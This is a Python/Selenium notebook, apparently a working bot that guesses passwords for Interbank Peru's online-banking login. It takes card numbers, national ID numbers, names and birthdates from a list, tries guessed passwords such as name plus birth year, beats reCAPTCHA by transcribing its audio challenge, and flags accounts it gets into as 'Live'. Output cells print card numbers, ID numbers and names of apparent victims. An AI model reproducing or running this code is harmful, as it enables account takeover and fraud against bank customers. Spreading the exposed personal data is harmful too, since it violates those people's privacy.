In [6]:
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.firefox.options import FirefoxProfile

import time
import requests
import PosiblesPass
import audioConvert

In [7]:
class Xpath:
    numTarjeta = '//*[@id="25"]'
    documentoDNI = '//*[@id="39"]'
    claveWeb = '//*[@id="46"]'
    keyboardlader= '/html/body/div[1]/div[2]/div[1]/div[2]/div[2]/div/div/div/div[1]/div/div[2]/div/div[2]/div/div/div'
    btnIngresar = '/html/body/div[1]/div[2]/div[1]/div[2]/div[2]/div/div/div/div[1]/div/button'
    
    modalLoSentimos= '/html/body/div[1]/div[2]/div[3]/div[1]/div/div/div'
    modaltextoLoSentimos = '/html/body/div[1]/div[2]/div[3]/div[1]/div/div/div/div/div[last()]/span'
    iframecaptcha = '//*[@id="recaptcha-verify-button"]'
    

    

In [8]:
contador = 0
class BotInterbank:
    def __init__(self, driver):
        self.driver = driver
        
    def captcha(self):
        iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
        self.driver.switch_to.frame(iframe)
        time.sleep(1)
        self.driver.find_element(By.XPATH, '//*[@id="recaptcha-audio-button"]').click()
        # Volver al contenido principal
        time.sleep(0.6)
        self.driver.switch_to.default_content()
        
    def descargar_audio_captcha(self):
        # Asegúrate de estar en el contexto correcto del iframe
        wait0 = WebDriverWait(self.driver, 10)
        wait0.until(EC.visibility_of_element_located((By.XPATH, "/html/body/div[3]/div[2]/iframe"))) 
        iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
        self.driver.switch_to.frame(iframe)

        # Obtener el URL del audio directamente
        audio_element = self.driver.find_element(By.ID, "audio-source")
        audio_url = audio_element.get_attribute('src')

        # Cambia al contenido principal antes de usar requests
        self.driver.switch_to.default_content()

        # Descarga el archivo de audio usando requests
        response = requests.get(audio_url, stream=True)
        if response.status_code == 200:
            path_to_save_audio = 'captcha_audio.mp3'  # Cambia a tu ruta local si no estás en un entorno que use '/mnt/data'
            with open(path_to_save_audio, 'wb') as file:
                for chunk in response.iter_content(chunk_size=8192):
                    file.write(chunk)
                print("El audio del captcha ha sido descargado con éxito en:", path_to_save_audio)
                return path_to_save_audio  # Retorna la ruta del archivo guardado
        else:
            print("Error al descargar el archivo de audio. Estado HTTP:", response.status_code)
        
    def audio_a_texto(self):
        try:
            iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
            self.driver.switch_to.frame(iframe)
            
            text = audioConvert.audioATexto('captcha_audio.mp3')
            self.driver.find_element(By.XPATH, '//*[@id="audio-response"]').send_keys(text)
            self.driver.find_element(By.XPATH, '//*[@id="recaptcha-verify-button"]').click()
            
            # Cambia al contenido principal antes de usar requests
            self.driver.switch_to.default_content()
        except:
            return 'No paso captcha'
            
        return 'Paso captcha'
        
    def click_key(self, key_id):
        try:
            key_element = self.driver.find_element(By.XPATH, f"//span[./*[@id='{key_id}']]")
            self.driver.execute_script("arguments[0].click();", key_element)
        except NoSuchElementException:
            print(f"No se encontró la tecla con id {key_id}.")
        except Exception as e:
            print(f"Error al hacer clic en la tecla: {e}")
        #time.sleep(0.5)

    def click_svg_element(self, svg_element):
        self.driver.execute_script("""
        var evt = new MouseEvent('click', {
            bubbles: true,
            cancelable: true,
            view: window
        });
        arguments[0].dispatchEvent(evt);
        """, svg_element)
        
    def click_caps_lock(self):
        try:
            # Aquí se asume que 'Shape' es el id correcto para la tecla de mayúsculas
            caps_lock_element = self.driver.find_element(By.XPATH, "//*[@id='Shape']")
            self.click_svg_element(caps_lock_element)
        except NoSuchElementException:
            print("No se encontró la tecla de mayúsculas.")
        except Exception as e:
            print(f"Error al hacer clic en la tecla de mayúsculas: {e}")

    def send_keys(self, input_string):
        for char in input_string:
            self.click_key(char)
            
        
    def open_calarLogos(self,linea):
        global contador  # Indica que vas a usar la variable global
        wait0 = WebDriverWait(self.driver, 10)
        poscontra = 0
        
        partes =  linea.strip().split(',')
        
        print(f' - {linea} > > >') #4110930625861841,07316480,06/04/1959,ELIZABETH CLOTILDE,GARCIA,CAMARGO
        if 'None' in linea:
            print('No hay datos del DNI > > > omitiendo...')
            return 'Death'
        tarjeta = partes[0]
        dni = partes[1]
        
        while(poscontra<4):
            
            self.driver.get("https://bancaporinternet.interbank.pe/login")
            
            self.driver.find_element(By.XPATH, Xpath.numTarjeta).send_keys(str(tarjeta))
            self.driver.find_element(By.XPATH, Xpath.documentoDNI).send_keys(str(dni))
            time.sleep(0.1)
            self.driver.find_element(By.XPATH, Xpath.claveWeb).send_keys("0")
            self.driver.find_element(By.XPATH, Xpath.claveWeb).click()
            
            
            data = PosiblesPass.procesar_cadena_Interbank(linea)
            #print("Data:", data)
            clave = data[poscontra]
            print("Clave probando:", clave)
            
            wait0.until(EC.visibility_of_element_located((By.XPATH, Xpath.keyboardlader))) #Esperar el teclado en pantalla
            self.click_key(clave[0])
            self.click_caps_lock()
            self.send_keys(clave[1:])
            
            self.driver.find_element(By.XPATH, Xpath.btnIngresar).click()
            
            url_actual = self.driver.current_url
            urlLive= 'https://bancaporinternet.interbank.pe/bpi/inicio'

            death1 = 'Por tu seguridad, tu clave web ha sido bloqueada por intentos errados'
            death2= 'Es momento de cambiar tu clave web'
            death3= 'Aún no has creado tu clave web. Por favor regístrate'
            death4 = 'Ahora tu clave web será más segura' #. Ingresa a “Olvidé mi clave web” y sigue los nuevos consejos de seguridad.
            death5= 'Para continuar con el proceso, necesitamos confirmar tu identidad.'
            
            bandeip= 'Tu operación no ha podido ser realizada.'
            retornar = 'Los datos ingresados son incorrectos.'
            
            print('------------------------------------------------------------------------------------------------------------------------------')
            contador += 1
            while True:
                time.sleep(0.1)
                try:
                    #print("Modal error")
                    modal_error  = self.driver.find_element(By.XPATH, '/html/body/div[1]/div[2]/div[3]/div[1]/div/div/div/div/div[3]/span | /html/body/div[1]/div[2]/div[3]/div[1]/div/div/div/div/div[4]/span')  
                    if modal_error.is_displayed():
                        modaltext = modal_error.text
                        print(f' / / / {contador} / / -----> texto > {modaltext}')
                        if death1 in modaltext or death2 in modaltext or death3 in modaltext or death4 in modaltext or death5 in modaltext:
                            return 'Death'
                        
                        if bandeip in modaltext:
                            return 'BandIP'
                        
                        if retornar in modaltext: # para retornar y calar otra contrasena no mas
                            break
                        #print(retornar)
                        break # aparecio el modal de error 
                except Exception :
                    pass
                
                #Por si aparece el modal del captcha
                try:
                    iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
                    self.driver.switch_to.frame(iframe)
                    
                    iframe = self.driver.find_element(By.XPATH, Xpath.iframecaptcha)
                    #print(modal_error.text)
                    if iframe.is_displayed():
                        self.driver.switch_to.default_content()
                        #print("/ / / / Captcha Detected / / / / / /")
                        #Resolver captcha
                        #print("Resolviendo captcha")
                        self.captcha()
                        #print("Descargando audio captcha")
                        self.descargar_audio_captcha()
                        #print("Convirtiendo audio a texto")
                        result = self.audio_a_texto()
                        
                        #print("Resultado captcha:", result)
                        if result == 'No paso captcha':
                            
                            poscontra -= 1
                            break
                        
                        
                        
                except Exception as e:
                    # Cambia al contenido principal antes de usar requests
                    #print(f'error al resolver captcha: {e}')
                    #input()
                    self.driver.switch_to.default_content()
                    
                if poscontra == 4:
                    return 'Death'
                
                if url_actual == urlLive:
                    print("Cambio Url")
                    return 'Live'
                
            poscontra += 1
            

In [9]:
if __name__ == '__main__':
    # Configurar opciones de Firefox
    firefox_options = Options()
    firefox_profile = FirefoxProfile()
    firefox_profile.set_preference("general.useragent.override", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36")

    firefox_options.binary_location = r'C:\Program Files\Mozilla Firefox\firefox.exe'

    driver = webdriver.Firefox(options=firefox_options, firefox_profile=firefox_profile)
    

In [ ]:
bot = BotInterbank(driver)

def run():

    with open("lotelogo.txt", "r") as archivo:
        for linea in archivo:
            print('\n\n\n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n')
            response = bot.open_calarLogos(linea)
            if response == 'Live':
                print(f"Tarjeta: {linea.strip()} - - - > Acceso exitoso")
                
            if response == 'BandIP':
                print(f"Tarjeta: {linea.strip()} - - - > Bandeip")
                input("Presione enter para continuar...")
            if response == 'Death':
                print(f"Tarjeta: {linea.strip()} - - - > D E A T H")
            
            #input("Presione enter para continuar...")
     
#En el 4to intento se bloquea la cuenta
run()




 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



 - 4110930628015486,41244514,05/01/1982,MARIELA JANET,SILVA,GIL
 > > >
Clave probando: Mariela1982
------------------------------------------------------------------------------------------------------------------------------
El audio del captcha ha sido descargado con éxito en: captcha_audio.mp3
Clave probando: Mariela1982
------------------------------------------------------------------------------------------------------------------------------
El audio del captcha ha sido descargado con éxito en: captcha_audio.mp3
MoviePy - Writing audio in captcha_audio.wav


MoviePy - Done.
texto: eh con el sistema
 / / / 2 / / -----> texto > Para continuar con el proceso, necesitamos confirmar tu identidad. Por favor llámanos (211-8624)
Tarjeta: 4110930628015486,41244514,05/01/1982,MARIELA JANET,SILVA,GIL - - - > D E A T H



 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



 - 4110930624107352,29554547,22/12/1971,ELSA,CABRERA,PASCA
 > > >
Clave probando: Elsa1971
------------------------------------------------------------------------------------------------------------------------------


InvalidSessionIdException: Message: Tried to run command without establishing a connection


# IBK BOT 

In [ ]:
run()

Test para Captcha> > >

In [ ]:

class BotInterbank:
    def __init__(self, driver):
        self.driver = driver
      
    def abrirweb(self):
        self.driver.get("https://bancaporinternet.interbank.pe/login")
        
    def captcha(self):
        iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
        self.driver.switch_to.frame(iframe)
        self.driver.find_element(By.XPATH, '//*[@id="recaptcha-audio-button"]').click()
        # Volver al contenido principal
        self.driver.switch_to.default_content()
        
    def descargar_audio_captcha(self):
        # Asegúrate de estar en el contexto correcto del iframe
        iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
        self.driver.switch_to.frame(iframe)

        # Obtener el URL del audio directamente
        audio_element = self.driver.find_element(By.ID, "audio-source")
        audio_url = audio_element.get_attribute('src')

        # Cambia al contenido principal antes de usar requests
        self.driver.switch_to.default_content()

        # Descarga el archivo de audio usando requests
        response = requests.get(audio_url, stream=True)
        if response.status_code == 200:
            path_to_save_audio = 'captcha_audio.mp3'  # Cambia a tu ruta local si no estás en un entorno que use '/mnt/data'
            with open(path_to_save_audio, 'wb') as file:
                for chunk in response.iter_content(chunk_size=8192):
                    file.write(chunk)
                print("El audio del captcha ha sido descargado con éxito en:", path_to_save_audio)
                return path_to_save_audio  # Retorna la ruta del archivo guardado
        else:
            print("Error al descargar el archivo de audio. Estado HTTP:", response.status_code)
        
    def audio_a_texto(self):
        iframe = self.driver.find_element(By.XPATH, "/html/body/div[3]/div[2]/iframe")
        self.driver.switch_to.frame(iframe)
        
        text = audioConvert.audioATexto('captcha_audio.mp3')
        self.driver.find_element(By.XPATH, '//*[@id="audio-response"]').send_keys(text)
        self.driver.find_element(By.XPATH, '//*[@id="recaptcha-verify-button"]').click()
        
        # Cambia al contenido principal antes de usar requests
        self.driver.switch_to.default_content()
        


   

In [ ]:
bot = BotInterbank(driver)
bot.abrirweb()

In [ ]:
bot = BotInterbank(driver)
bot.captcha()

In [ ]:
bot = BotInterbank(driver)
bot.descargar_audio_captcha()

In [ ]:
bot = BotInterbank(driver)
bot.audio_a_texto()